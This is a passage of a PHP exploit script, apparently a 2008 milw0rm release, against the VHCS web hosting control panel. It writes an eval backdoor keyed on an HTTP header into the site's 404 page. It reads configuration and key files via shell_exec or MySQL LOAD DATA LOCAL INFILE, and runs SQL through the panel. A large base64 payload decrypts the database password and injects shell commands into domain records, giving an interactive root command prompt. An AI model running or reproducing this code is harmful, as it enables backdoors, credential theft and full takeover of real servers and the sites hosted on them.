		$this-&gt;get($this-&gt;dmn_url.'/errors/404/index.php');
		$this-&gt;old_404 = $this-&gt;getcontent();

		$this-&gt;phpc =
		 '&lt;?php '
		.'error_reporting(0); '
		.'if(isset($_SERVER[\'HTTP_SHELL\'])) '
		.'{ eval(base64_decode($_SERVER[\'HTTP_SHELL\'])); exit(0); } '
		.'?&gt;';

		$this-&gt;new_404 = $this-&gt;phpc.$this-&gt;old_404;

		$this-&gt;post($this-&gt;dmn_vhcs_url.'client/error_pages.php',
		'error='.urlencode($this-&gt;new_404).'&uaction=updt_error&eid=404&Submit=+Save+');

		$this-&gt;exec_php('print "itworkz";');

		if(ereg('itworkz', $this-&gt;getcontent()))
		{
			$this-&gt;msg('PHP code successfully written', 1);

			return TRUE;
		}
		else
		{
			$this-&gt;msg("Can't write PHP code", -1);

		   	return FALSE;
		}
	}

	function get_vhcs_conf()
	{
		if($this-&gt;safe_mode)
		   $this-&gt;msg('Trying to load files via local_infile', 0);

		else
		   $this-&gt;msg('Trying to load files via shell_exec', 0);

		$this-&gt;lf_conf   = $this-&gt;path_content($this-&gt;conf_path);
		$this-&gt;lf_conf   = trim($this-&gt;lf_conf, "\r");

		$this-&gt;vhcs_conf = explode("\n", $this-&gt;lf_conf);

		$this-&gt;conf = array();

		foreach($this-&gt;vhcs_conf as $this-&gt;conf_line)
		{
			# comment
			if(!ereg('^(\s*)#', $this-&gt;conf_line))
			{
				$this-&gt;pos   = strpos($this-&gt;conf_line, '=');
				$this-&gt;name  = strtoupper(trim(substr($this-&gt;conf_line, 0, $this-&gt;pos)));
				$this-&gt;value = trim(substr($this-&gt;conf_line, $this-&gt;pos+1));

				$this-&gt;conf[$this-&gt;name] = $this-&gt;value;
			}
		}

		$this-&gt;php_keys_code = $this-&gt;path_content($this-&gt;keys_path);

		return;
	}

	function path_content($path)
	{
		# open_basedir On/off
		# safe_mode = Off
		if(!$this-&gt;safe_mode)
		{
			$this-&gt;phpc = 'print shell_exec("cat '.$path.'");';

			$this-&gt;exec_php($this-&gt;phpc);

			$this-&gt;file_content = $this-&gt;getcontent();

		}

		# open_basedir On/Off
		# safe_mode = On
		else
		{
			$this-&gt;rand_table = rand().'tmp_hax'.rand();

			$this-&gt;sql_query =
			"CREATE TABLE ".$this-&gt;rand_table." (content text not null); ".
			"LOAD DATA LOCAL INFILE '$path' INTO TABLE ".$this-&gt;rand_table.
			" FIELDS TERMINATED BY '__EOF__' ESCAPED BY '' LINES TERMINAT".
			"ED BY '__EOF__'; SELECT CONCAT(CHAR(80,87,78,69,68,67,79,78,".
			"84,69,78,84),HEX(content),CHAR(80,87,78,69,68,67,79,78,84,69".
			",78,84)) FROM ".$this-&gt;rand_table."; DROP TABLE ".
			$this-&gt;rand_table;

			$this-&gt;sql_arr = explode(';', $this-&gt;sql_query);
			$this-&gt;sql_cnt = count($this-&gt;sql_arr);

			for($i=0; $i&lt;$this-&gt;sql_cnt; $i++)
			{
				$this-&gt;sql_res = $this-&gt;exec_sql($this-&gt;sql_arr[$i]);

				if($i == $this-&gt;sql_cnt-2)
				   $this-&gt;file_content = $this-&gt;sql_res;
			}
			
		}

		if(!$this-&gt;file_content)
		{
			$this-&gt;msg("A problem occurred while trying to read the file $path", -1);
			
			if($this-&gt;safe_mode)
			   $this-&gt;msg("local_infile=Off or we don't have sufficient access rights to the file", -1, 2);

			else
			   $this-&gt;msg("We don't have sufficient access rights to the file", -1, -2);
		}
		else
		   $this-&gt;msg("Ok: $path", 1);

		return $this-&gt;file_content;
	}

	function exec_sql($query)
	{
		$this-&gt;post($this-&gt;dmn_vhcs_url.'client/sql_execute_query.php',
		'user_name=&sql_query='.$query.'&Submit=+Execute+&uaction=exe'.
		'cute_query&id='.$this-&gt;db_user_id);

		$this-&gt;sql_result = '';

		if(ereg('PWNEDCONTENT', $this-&gt;getcontent()))
		{
			$this-&gt;sql_res_arr = explode('PWNEDCONTENT', $this-&gt;getcontent());

			$this-&gt;sql_result  = pack('H*', $this-&gt;sql_res_arr[1]);
		}
	
		return $this-&gt;sql_result;
	}

	function is_safe()
	{
		$this-&gt;phpc =
		'if(in_array(strtoupper(ini_get("safe_mode")),array("ON","1")) '
	       .'or !function_exists("shell_exec")) '
	       .'{ print "safe_mode=on"; }';

		$this-&gt;exec_php($this-&gt;phpc);

		# open_basedir always set
		if(ereg('safe_mode=on', $this-&gt;getcontent()))
		{
			$this-&gt;msg("We'll have to bypass open_basedir cause safe_mode=On", 0);

			$this-&gt;safe_mode = TRUE;
		}
		else
		{
			$this-&gt;msg('PHP configured with default safe_mode value (Off)', 0);

			$this-&gt;safe_mode = FALSE;
		}

		return $this-&gt;safe_mode;
	}

	function exec_cmd()
	{
		$this-&gt;msg("Now you can execute commands as root =]", 1);

		$this-&gt;woot_code =
		 'PD9waHAKCi8qCm1haWwoJ2xlZXRAcHduZWQuY29tJywgJ3Z1bG'
		.'5lcmFibGUgdmhjcyBob3N0ICEnLCAndGh4IHRvIHRoZSBzayAh'
		.'IHZoY3MgdnVsbiBob3N0OiAnLiRfU0VSVkVSWydSRU1PVEVfQU'
		.'REUiddKTsKdGhpcyBpcyBhIGpva2UgPVAgd2hlbiB5b3UgdXNl'
		.'IGVuY29kZWQgcGhwIGNvZGUsIHNlZSB3aGF0IGlzIGl0IGJlZm'
		.'9yZSB1c2luZyBpdCA9KQoqLwokdmFsaWRfdiA9ICdIVFRQX1NQ'
		.'TE9JVF8nOwoKZm9yZWFjaCgkX1NFUlZFUiBhcyAkaGVhZGVyID'
		.'0+ICR2YWx1ZSkKewoJaWYoIWlzX2FycmF5KCR2YWx1ZSkpCgl7'
		.'CgkJJHZhbHVlID0gYmFzZTY0X2RlY29kZSgkdmFsdWUpOwoKCQ'
		.'lpZihlcmVnKCR2YWxpZF92LCRoZWFkZXIpKQoJCXsKCQkJaWYo'
		.'ZXJlZygnUEhQX0tFWVMnLCAkaGVhZGVyKSkKCQkJICAgZXZhbC'
		.'gkdmFsdWUpOwoKCQkJZWxzZQoJCQl7CgkJCQkkdmFyX24gID0g'
		.'c3RydG9sb3dlcihzdHJfcmVwbGFjZSgkdmFsaWRfdiwnJywgJG'
		.'hlYWRlcikpOwoJCQkJJCR2YXJfbiA9ICR2YWx1ZTsKCQkJfQoJ'
		.'CX0KCX0KfQoKbXlzcWxfY29ubmVjdCgkZGJfaG9zdCwkZGJfdX'
		.'NlcixkZWNyeXB0X2RiX3Bhc3N3b3JkKCRkYl9wYXNzKSk7Cm15'
		.'c3FsX3NlbGVjdF9kYigkZGJfbmFtZSk7CgokZmlsZSA9IGFkZH'
		.'NsYXNoZXMoJGZpbGUpOwokY21kICA9IGFkZHNsYXNoZXMoJGNt'
		.'ZCk7CiRWZXJzaW9uID0gJHZlcnNpb247CgokYWRkID0gYXJyYX'
		.'koKTsKJGFkZFtdID0gCiJJTlNFUlQgSU5UTyBkb21haW4gKGBk'
		.'b21haW5fbmFtZWAsYGRvbWFpbiIuCiJfZ2lkYCxgZG9tYWluX3'
		.'VpZGAsYGRvbWFpbl9hZG1pbl9pZGAsYGRvbSIuCiJhaW5fY3Jl'
		.'YXRlZF9pZGAsYGRvbWFpbl9jcmVhdGVkYCxgZG9tYWluXyIuCi'
		.'JsYXN0X21vZGlmaWVkYCxgZG9tYWluX21haWxhY2NfbGltaXRg'
		.'LGBkbyIuCiJtYWluX2Z0cGFjY19saW1pdGAsYGRvbWFpbl90cm'
		.'FmZmljX2xpbWl0YCIuCiIsYGRvbWFpbl9zcWxkX2xpbWl0YCxg'
		.'ZG9tYWluX3NxbHVfbGltaXRgLCIuCiJgZG9tYWluX3N0YXR1c2'
		.'AsYGRvbWFpbl9hbGlhc19saW1pdGAsYGRvbSIuCiJhaW5fc3Vi'
		.'ZF9saW1pdGAsYGRvbWFpbl9pcF9pZGAsYGRvbWFpbl9kaSIuCi'
		.'Jza19saW1pdGAsYGRvbWFpbl9kaXNrX3VzYWdlYCxgZG9tYWlu'
		.'X3BocCIuCiJgLGBkb21haW5fY2dpYCkgVkFMVUVTICgnZGVsZX'
		.'RlbWViaWF0Y2g7JGNtZCIuCiIgPiAkZmlsZTtybSAvdG1wL2h0'
		.'YWNjZXNzLXVzZXItY2YtZGVsZXRlbSIuCiJlYmlhdGNoO2VjaG'
		.'8gMSMnLCcwJywgJzAnLCAnLTEnLCAnLTEnLCAnMCIuCiInLCAn'
		.'MCcsICcwJywgJzAnLCAnMCcsICcwJywgJzAnLCdvaycsICcwJy'
		.'IuCiIsJzAnLCAnLTEnLCAnMCcsICcwJywgJ3llcycsICd5ZXMn'
		.'KSI7CgokYWRkW10gPQoiSU5TRVJUIElOVE8gaHRhY2Nlc3MgKG'
		.'BkbW5faWRgLGB1c2VyX2lkYCwiLgoiYGdyb3VwX2lkYCxgYXV0'
		.'aF90eXBlYCxgYXV0aF9uYW1lYCxgcGF0aGAiLgoiLGBzdGF0dX'
		.'NgKSBWQUxVRVMgKChTRUxFQ1QgZG9tYWluX2lkIEZST00iLgoi'
		.'IGRvbWFpbiBXSEVSRSBkb21haW5fbmFtZSBMSUtFICclJGZpbG'
		.'UlJykiLgoiLC0xLDAsJ0Jhc2ljJywnaHVodScsJy90bXAnLCd0'
		.'b2FkZCcpIjsKCmV4ZWNfc3FsKCRhZGQpOwoKc2VuZF9yZXF1ZX'
		.'N0KCk7CnNsZWVwKCRzbGVlcF90aW1lKTsKcHJpbnQoZmlsZV9n'
		.'ZXRfY29udGVudHMoJGZpbGUpKTsKdW5saW5rKCRmaWxlKTsKCi'
		.'RkZWwgPSBhcnJheSgpOwokZGVsW10gPSAKIkRFTEVURSBGUk9N'
		.'IGh0YWNjZXNzIFdIRVJFIGRtbl9pZCA9IChTRUxFQyIuCiJUIG'
		.'RvbWFpbl9pZCBGUk9NIGRvbWFpbiBXSEVSRSBkb21haW5fbmFt'
		.'ZSAiLgoiTElLRSAnJSRmaWxlJScpIjsKCiRkZWxbXSA9CiJERU'
		.'xFVEUgRlJPTSBkb21haW4gV0hFUkUgZG9tYWluX25hbWUgTElL'
		.'RSAiLgoiJyUkZmlsZSUnIjsKCmV4ZWNfc3FsKCRkZWwpOwoKZn'
		.'VuY3Rpb24gZXhlY19zcWwoJHNxbF9hcnIpCnsKCWZvcmVhY2go'
		.'JHNxbF9hcnIgYXMgJHNxbF9xKQoJICAgbXlzcWxfcXVlcnkoJH'
		.'NxbF9xKSB8fCBkaWUobXlzcWxfZXJyb3IoKSk7CgoJcmV0dXJu'
		.'Owp9CgovLyB2aGNzCmZ1bmN0aW9uIGRlY3J5cHRfZGJfcGFzc3'
		.'dvcmQgKCRkYl9wYXNzKSB7CgogICAgIGdsb2JhbCAkdmhjczJf'
		.'ZGJfcGFzc19rZXk7CiAgICAgZ2xvYmFsICR2aGNzMl9kYl9wYX'
		.'NzX2l2OwogICAgICAgICAgIAogICAgJHRleHQgPSBiYXNlNjRf'
		.'ZGVjb2RlKCIkZGJfcGFzc1xuIik7CiAgICAKICAgIC8qIE9wZW'
		.'4gdGhlIGNpcGhlciAqLwogICAgJHRkID0gbWNyeXB0X21vZHVs'
		.'ZV9vcGVuICgnYmxvd2Zpc2gnLCAnJywgJ2NiYycsICcnKTsKIC'
		.'AgIAogICAgLyogQ3JlYXRlIGtleSAqLwogICAgICAgICRrZXkg'
		.'PSAkdmhjczJfZGJfcGFzc19rZXk7CiAgICAKICAgIC8qIENyZW'
		.'F0ZSB0aGUgSVYgYW5kIGRldGVybWluZSB0aGUga2V5c2l6ZSBs'
		.'ZW5ndGggKi8KICAgICAgICAkaXYgPSAkdmhjczJfZGJfcGFzc1'
		.'9pdjsKICAgICAgCiAgICAvKiBJbnRpYWxpemUgZW5jcnlwdGlv'
		.'biAqLyAgICAgICAgICAgICAgICAgICAgCiAgICBtY3J5cHRfZ2'
		.'VuZXJpY19pbml0ICgkdGQsICRrZXksICRpdik7CiAgICAgICAg'
		.'ICAgICAgICAgICAgICAKICAgIC8qIERlY3J5cHQgZW5jcnlwdG'
		.'VkIHN0cmluZyAqLyAgICAKICAgICRkZWNyeXB0ZWQgPSBtZGVj'
		.'cnlwdF9nZW5lcmljICgkdGQsICR0ZXh0KTsKICAgICAgICAgIC'
		.'AgICAgICAgICAgICAgICAKICAgIG1jcnlwdF9tb2R1bGVfY2xv'
		.'c2UgKCR0ZCk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgIC'
		.'AgICAgCiAgICAvKiBTaG93IHN0cmluZyAqLyAgICAgICAgICAg'
		.'ICAgICAgICAgICAgICAgICAgICAgICAKICAgIHJldHVybiB0cm'
		.'ltKCRkZWNyeXB0ZWQpOwp9CgovLyB2aGNzCmZ1bmN0aW9uIHNl'
		.'bmRfcmVxdWVzdCgpIHsKCiAgICBnbG9iYWwgJFZlcnNpb24sIC'
		.'RWZXJzaW9uSCwgJEJ1aWxkRGF0ZTsKCiAgICBAJHNvY2tldCA9'
		.'IHNvY2tldF9jcmVhdGUgKEFGX0lORVQsIFNPQ0tfU1RSRUFNLC'
		.'AwKTsKCiAgICBpZiAoJHNvY2tldCA8IDApIHsKICAgICAgICAk'
		.'ZXJybm8gPSAgInNvY2tldF9jcmVhdGUoKSBmYWlsZWQuXG4iOw'
		.'ogICAgICAgIHJldHVybiAkZXJybm87CiAgICB9CgogICAgQCRy'
		.'ZXN1bHQgPSBzb2NrZXRfY29ubmVjdCAoJHNvY2tldCwgIjEyNy'
		.'4wLjAuMSIsIDk4NzYpOwogICAgaWYgKCRyZXN1bHQgPT0gRkFM'
		.'U0UpIHsKICAgICAgICAkZXJybm8gPSAgInNvY2tldF9jb25uZW'
		.'N0KCkgZmFpbGVkLlxuIjsKICAgICAgICByZXR1cm4gJGVycm5v'
		.'OwogICAgfQoKICAgIC8qIHJlYWQgb25lIGxpbmUgd2l0aCB3ZW'
		.'xjb21lIHN0cmluZyAqLwogICAgJG91dCA9IHJlYWRfbGluZSgk'
		.'c29ja2V0KTsKCiAgICAvKiBzZW5kIGhlbGxvIHF1ZXJ5ICovCi'
		.'AgICAkcXVlcnkgPSAiaGVsbyAgJFZlcnNpb25cclxuIjsKICAg'
		.'IHNvY2tldF93cml0ZSAoJHNvY2tldCwgJHF1ZXJ5LCBzdHJsZW'
		.'4gKCRxdWVyeSkpOwoKICAgIC8qIHJlYWQgb25lIGxpbmUgd2l0'
		.'aCBoZWxvIGFuc3dlciAqLwogICAgJG91dCA9IHJlYWRfbGluZS'
		.'gkc29ja2V0KTsKCiAgICAvKiBzZW5kIHJlZyBjaGVjayBxdWVy'
		.'eSAqLwogICAgJHF1ZXJ5ID0gImV4ZWN1dGUgcXVlcnlcclxuIj'
		.'sKICAgIHNvY2tldF93cml0ZSAoJHNvY2tldCwgJHF1ZXJ5LCBz'
		.'dHJsZW4gKCRxdWVyeSkpOwogICAgLyogcmVhZCBvbmUgbGluZS'
		.'BrZXkgcmVwbGF5ICovCiAgICAkZXhlY3V0ZV9yZXBsYXkgPSBy'
		.'ZWFkX2xpbmUoJHNvY2tldCk7CgogICAgLyogc2VuZCBxdWl0IH'
		.'F1ZXJ5ICovCiAgICAkcXVpdF9xdWVyeSA9ICJieWVcclxuIjsK'
		.'ICAgIHNvY2tldF93cml0ZSAoJHNvY2tldCwgJHF1aXRfcXVlcn'
		.'ksIHN0cmxlbiAoJHF1aXRfcXVlcnkpKTsKICAgIC8qIHJlYWQg'
		.'cXVpdCBhbnN3ZXIgKi8KICAgICRxdWl0X3JlcGxheSA9IHJlYW'
		.'RfbGluZSgkc29ja2V0KTsKCiAgICAvKiBhbmFseXplIGtleSBy'
		.'ZXBsYXkgKi8KICAgICRhbnN3ZXIgPSAkZXhlY3V0ZV9yZXBsYX'
		.'k7CgogICAgLyogY2xvc2Ugc29ja2V0ICovCiAgICBzb2NrZXRf'
		.'Y2xvc2UgKCRzb2NrZXQpOwoKICAgIC8qIHJldHVybiBmdW5jdG'
		.'lvbiByZXN1bHQgKi8KICAgIHJldHVybiAkYW5zd2VyOwoKfQoK'
		.'Ly8gdmhjcwpmdW5jdGlvbiByZWFkX2xpbmUoJHNvY2tldCkgew'
		.'0KICAgICRjaCA9ICcnOw0KICAgICRsaW5lID0gJyc7DQogICAg'
		.'ZG97DQogICAgICAgICRjaCA9IHNvY2tldF9yZWFkKCRzb2NrZX'
		.'QsMSk7DQogICAgICAgICRsaW5lID0gJGxpbmUgLiAkY2g7DQog'
		.'ICAgfSB3aGlsZSgkY2ggIT0gIlxyIik7DQogICAgcmV0dXJuIC'
		.'RsaW5lOw0KfQo/Pgo=';

 		while($this-&gt;cmd_prompt())
		{
			$this-&gt;exec_php('print $_SERVER["DOCUMENT_ROOT"];');
			$this-&gt;tmp_file = $this-&gt;getcontent().'/'.md5(rand());

			$this-&gt;set_hvar('db-host',    $this-&gt;conf['DATABASE_HOST']);
			$this-&gt;set_hvar('db-user',    $this-&gt;conf['DATABASE_USER']);
			$this-&gt;set_hvar('db-pass',    $this-&gt;conf['DATABASE_PASSWORD']);
			$this-&gt;set_hvar('db-name',    $this-&gt;conf['DATABASE_NAME']);

			$this-&gt;set_hvar('sleep-time', $this-&gt;sleep_time);
			$this-&gt;set_hvar('file',       $this-&gt;tmp_file);
			$this-&gt;set_hvar('cmd',        $this-&gt;cmd);
			$this-&gt;set_hvar('version',    $this-&gt;conf['Version']);
			
			$this-&gt;set_hvar('php-keys',   '?&gt;'.$this-&gt;php_keys_code);

			$this-&gt;exec_php('?&gt;'.base64_decode($this-&gt;woot_code));

			print "\n".$this-&gt;getcontent();
		}

		exit(0);
	}

	function set_hvar($name, $value)
	{
		$this-&gt;addheader('Sploit-'.$name, base64_encode($value));

		return;
	}

	function cmd_prompt()
	{
		$this-&gt;msg('root@'.$this-&gt;usr.': ', 1);
		$this-&gt;cmd = trim(fgets(STDIN));

		if(!ereg('^(quit|exit)$', $this-&gt;cmd))
		   return TRUE;

		else
		   return FALSE;
	}

	function exec_php($php)
	{
		$this-&gt;addheader('Shell', base64_encode($php));
		$this-&gt;get($this-&gt;dmn_url.'/errors/404/index.php');

		return;
	}

	function msg($msg, $flag, $action=0)
	{
		print "\n ".$this-&gt;flags[$flag]."\x20".$msg;

		switch($action)
		{
			case 1:
				print "\n";
				return $this-&gt;usage();
			break;

			case 2:
				print "\n";
				exit(1);
			break;
		}
	}
}

$spl = new vhcs_xpl;
$spl-&gt;main();

?&gt;

# milw0rm.com [2008-03-09]